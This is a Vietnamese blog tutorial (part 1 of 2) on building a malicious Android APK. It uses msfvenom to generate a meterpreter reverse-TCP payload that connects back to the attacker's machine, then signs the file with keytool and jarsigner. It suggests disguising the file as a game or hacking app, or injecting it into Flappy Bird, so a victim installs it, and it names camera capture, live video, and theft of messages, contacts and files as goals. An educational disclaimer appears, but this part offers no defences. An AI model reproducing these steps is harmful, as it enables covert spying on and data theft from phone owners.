HƯỚNG DẪN THỬ HACK ĐIỆN THOẠI ANDROID – TRẢI NGHIỆM VÀ BIỆN PHÁP HẠN CHẾ – PHẦN 01

0
1475
hack điện thoại android
hack điện thoại android

HƯỚNG DẪN HACK ĐIỆN THOẠI CHẠY HỆ ĐIỀU HÀNH ANDROID – PHẦN 01

 

Bài viết mang tính chất tham khảo, dành cho học tập, nghiên cứu và cho các bạn tìm tòi học hỏi. Chúng tôi không chịu trách nhiệm liên đới nếu các bạn áp dụng để phá hoại nhé..

Bạn đang phân vân về vấn đề điện thoại bị hack ?

Ban thắc mắc khi bị hack thì điện thoại của bạn sẽ như thế nào?

Biểu hiện của việc bạn đã bị xâm nhập là ra sao ?

Những thông tin cá nhân của bạn có còn an toàn hay không?

Hacker lấy được những gì từ điện thoại của bạn và dùng chúng để làm gì ?

Hoặc bạn đang muốn thử hack phát chơi :v :v

 

Mô tả tổng quan bài viết: 

Trong bài viết này, mình sẽ thử nghiệm việc hack thử một chiếc điện thoại, chụp ảnh trực tiếp từ điện thoại đó và gửi về máy tính của mình, đồng thời xem video từ camera của điện thoại đó trong thời gian thực. ngoài ra, còn có thể xem danh sách các file đang có trên bộ nhớ, thẻ nhớ của điện thoại đó, tải về nội dung tin nhắn, danh sách danh bạ…

Tại bài Viết này, chúng ta sẽ cùng nhau tìm hiểu những vấn đề trên, về một trong những cách mà hacker thường dùng để xâm nhập trái phép vào hệ thống của bạn, cách bạn bị lây nhiễm và các phương pháp phòng chống. Hy vọng sẽ giúp các bạn phần nào trong việc hiểu rõ các nguy cơ bị xâm nhập, các phương pháp phòng chống và bảo vệ mình trước những mối nguy hại tiềm tàng mà không phải ai cũng nhận thức được…

Vì nội dung của demo hơi dài nên mình sẽ chia ra làm 02 phần, nếu quan tâm bạn có thể theo dõi tiếp trong các bài viết tiếp theo của mình.

Phần 01 :  TẠO FILE APK CÀI ĐẶT VÀ CHỨNG CHỈ

Phần 02 : THỰC HÀNH : KHỞI TẠO MÔI TRƯỜNG VÀ TIẾN HÀNH TRẢI NGHIỆM

PHẦN 01 : THIẾT LẬP MÔI TRƯỜNG VÀ TẠO FILE *.APK

Các bước chuẩn bị trước khi bắt đầu :

  • Hệ điều hành kali linux, (có thể sử dụng máy thật hoặc cài trên máy ảo VMware để sử dụng đều được).
  • Một điện thoại sử dụng HĐH android.

CÓ THỂ BẠN QUAN TÂM:

TỔNG QUAN VỀ KALI LINUX
HƯỚNG DẪN CÀI ĐẶT MÁY ẢO VMWARE
HƯỚNG DẪN CÀI ĐẶT KALI LINUX TRÊN MÁY ẢO VMWARE
HƯỚNG DẪN CÀI ĐẶT VMWARE TOOLS TRÊN KALI

 

BẮT ĐẦU TIẾN HÀNH THÔI:

Video cho các bạn tham khảo:

 

Đầu tiên, các bạn cần Khởi động Kali linux, chi tiết về kali cũng như cách cài đặt máy ảo VMware, cài đặt KALI bạn có thể tham khảo các link ở đầu bài viết. :d

Bước 1: Xác định địa chỉ IP của Kali linux:

Lưu ý, nếu bạn đang chạy Kali trên máy ảo VMware thì cần đảm bảo rằng chế độ card mạng đang là Bridged (mục đích để kali nhận địa chỉ IP trực tiếp từ modem, Hình 1 )

Thiết lập chế độ Bridged cho card mạng VMware
Thiết lập chế độ Bridged cho card mạng VMware

Hình 1

Để bắt đầu, bạn cần mở ứng dụng Terminal trên Kali. (hình 2)

Mở ứng dụng Terminal trên Kali
Mở ứng dụng Terminal trên Kali

Hình 2

Sau đó nhập lệnh ifconfig để biết thông số IP đang nhận được (hình 3)

Tìm IP hệ thống
Tìm IP hệ thống

Hình 3

Sau khi đã đã đảm bảo IP trên kali và IP trên máy thật của bạn cùng thuộc một đường mạng, ở đây đường mạng của mình là [ 192.168.1.X ] chúng ta sẽ chuyển qua Bước 2

Bước 2: Tạo ứng dụng *.apk để cài đặt vào máy victim:

Cũng như trên windows, nếu muốn cài chương trình thì phải sử dụng file *.MSI hoặc file *.exe . File APK trên hệ điều hành Android được sử dụng để cài đặt phần mềm trên hệ thống này.

Nhập lệnh sau để tạo file *.apk, thay [My IP] bằng  địa chỉ IP của bạn, các bạn có thể đặt tên bất kỳ cho file này, trong bài viết này mình sẽ đặt tên cho nó là Hack_test.apk (Hình 3)

msfvenom -p android/meterpreter/reverse_tcp set host=[My IP] -o [Tên file apk].apk

Tạo file *.apk
Tạo file *.apk

Hình 3

Câu lệnh sẽ tạo ra 1 file Hack_test.apk ở trong Thư mục HOME

File được tạo ra trong thư mục HOME
File được tạo ra trong thư mục HOME

 

Bước 3 : Tạo file chữ ký

Các ứng dụng trên Android luôn phải có chữ ký kỹ thuật số trước khi nó được phép triển khai cài đặt trên thiết bị. Không giống như một số nền tảng điện thoại di động khác, bạn không cần phải đi mua giấy chứng nhận kỹ thuật số từ cơ quan cấp chứng nhận ( CA ) để đăng ký các ứng dụng của bạn. Mà thay vào đó, bạn có thể tự tạo ra chứng chỉ tự ký của riêng bản thân và sử dụng nó để đăng ký các ứng dụng Android. Nếu như ko có chữ ký thì bạn hoàn toàn không thể cài đặt file apk trên thiết bị được.

a. Tiến hành tạo file chứng chỉ :

Chúng ta sử dụng cú pháp lệnh như sau để tạo file này:

keytool -genkeypair -v -keystore [Tên file chữ ký].keystore -alias [Tên alias] -keyalg RSA -keysize [option] -validity [option]

Ở đây mình đã thay thế các Option thành câu lệnh cụ thể : Hình 4

keytool -genkeypair -v -keystore my_key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Tạo file Chứng Chỉ
Tạo file Chứng Chỉ

Hình 4

 

Màn hình nhập mật khẩu cho chứng chỉ. Bạn gõ vào bất kỳ mật khẩu nào có nhiều hơn 6 ký tự, rồi nhập thêm 1 lần nữa để xác nhận (Hình 5)

Tạo mật khẩu cho file Chứng Chỉ
Tạo mật khẩu cho file Chứng Chỉ

Hình 5

 

Một dãy các câu hỏi được tạo ra, các bạn cứ nhấn enter để bỏ trống (hình 6)

Trả lời các câu hỏi
Trả lời các câu hỏi

Hình 6

Tại bước xác nhận, bạn nhập Yes để đồng ý, sau đó nhập tiếp thêm 2 lần mật khẩu như trên để kết thúc  (hình 7)

Nhập lại mật khẩu cho file Chứng chỉ
Nhập lại mật khẩu cho file Chứng chỉ

Hình 7

 

b. Dùng file chứng chỉ để ký cho file apk

Sau khi đã tạo được file chứng chỉ, việc tiếp theo là kí cho file Hack_test.apk

Sử dụng lệnh với cú pháp như sau:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore [Tên file chữ ký] [tên file cần ký]  [tên alias]

Và mình chỉnh sửa lại nó thành (hình 8)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my_key.keystore  Hack_test.apk  alias_name

Dùng file chứng chỉ để ký cho file apk
Dùng file chứng chỉ để ký cho file apk

Hình 8

 

Nhập mật khẩu của file chứng chỉ (hình 9)

Nhập mật khẩu của file chứng chỉ để xác nhận
Nhập mật khẩu của file chứng chỉ để xác nhận

Hình 9

 

 

Vậy là chúng ta đã ký thành công cho file apk.

Sau khi ký xong, chúng ta đã có được 1 file apk hoàn chỉnh, việc tiêp theo sẽ là tìm cách cài đặt file này lên điện thoại cần hack.
Để thực hiện việc này có nhiều cách, ví dụ như như đổi tên file này thành tên của một ứng dụng game, hoặc tên một ứng dụng dùng để hack wifi, hack facebook… , hoặc cũng có thể dùng file apk này chèn thẳng vào 1 file apk khác, ví dụ như game flappy bird của Nguyễn Hà Đông chẳng hạn. Tuy đã bị gỡ khỏi googe Play nhưng game này vẫn luôn được người dùng tìm, tải về cài đặt.Và… flappy bird là game bị dính nhiều loại malware, virus, trojan, worm nhất hiện nay…. :))

Tóm lại: 

Qua các bước trên, chúng ta đã tạo được 1 file apk và tiến hành cấp chứng chỉ tạo độ truest cho file này.

Ở bài viết tiếp theo, chúng ta sẽ tìm cách để cài đặt file này lên điện thoại cần hack . Ở đây, thay vì mua một Hostting để update file apk này lên đó, thì mình sẽ dùng kali linux như là một dịch vụ Web Server luôn và lưu trữ tập tin apk này lên đây để thử nghiệm hiệu quả của file này một khi đã xâm nhập được vào hệ thống người dùng,  Hy vọng sẽ được sự đón nhận của các bạn.

Bước tiếp theo, các bạn có thể theo dõi tại :

PHẦN 02 : KHỞI TẠO MÔI TRƯỜNG VÀ TIẾN HÀNH TRẢI NGHIỆM

 

 

Mọi chi tiết góp ý các bạn có thể để lại dưới phần comment.

CÓ THỂ BẠN QUAN TÂM:

Tạo Một Fake Virus Để Troll Bạn Bè
HƯỚNG DẪN ĐĂNG KÝ VÀ TẠO MÁY ẢO VPS AMAZON 2017 MIỄN PHÍ 12 THÁNG – PHẦN I
Hack Mật Khẩu Wifi Chuẩn WPA – WPA2

 

Để tôn trọng quyền tác giả cũng như góp phần làm trong sạch môi trường Internet. đề nghị các bạn ghi rõ nguồn tại Vienthongbuonho.net khi muốn sử dụng lại bài viết trên nhé. Chân thành cảm ơn…

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BÌNH LUẬN